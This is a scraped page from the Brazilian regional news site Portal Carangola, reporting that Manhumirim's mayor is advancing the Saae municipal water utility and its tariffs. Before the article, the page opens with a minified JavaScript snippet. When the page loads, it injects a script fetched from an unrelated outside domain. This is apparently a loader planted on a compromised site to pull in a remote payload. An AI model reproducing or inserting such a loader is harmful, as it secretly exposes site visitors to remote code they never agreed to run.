;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Prefeitura de Manhumirim avança na implantação do Saae - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Prefeitura de Manhumirim avança na implantação do Saae

O Prefeito de Manhumirim, Ronaldo Lopes, reuniu secretários municipais e assessores nesta terça-feira, dia 13, para discutir a implantação do Saae no município. A Câmara Municipal já aprovou a criação da empresa pública e agora será enviado um projeto de Lei que estipula os cargos e vencimentos dos trabalhadores, além das tarifas a serem cobradas junto ao consumidor do serviço.
Atualmente, os custos com o fornecimento de água para a população urbana é todo custeado pela Prefeitura, totalizando um prejuízo de aproximadamente 400 mil reais por ano com despesas relacionadas. “Temos vários problemas atualmente como, por exemplo, o desperdício. Quando o Saae estiver em funcionamento, as pessoas pagarão pelo que consumir de forma racional. Quem gastar mais água tratada pagará mais e quem economizar, pagará menos. Acreditamos que dessa forma é mais justo para todos”, diz o Prefeito, Ronaldo Lopes.
O Prefeito afirmou ainda em seu programa semanal de rádio que cumprirá o compromisso de manter a tarifa mais baixa de toda a região. “Fizemos um levantamento e vimos que isto é possível. Precisamos receber o valor que for gasto, porém não queremos ter lucro com a cobrança do fornecimento de água”, disse.
A expectativa é que o Saae comece a funcionar em janeiro do ano que vem. Inicialmente, serão aproveitados os servidores que já trabalham no setor de fornecimento de água.
Leila Furtado / Assessoria de Comunicação / Prefeitura de Manhumirim
Ofertas
[secvitrine/agua/6329]

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.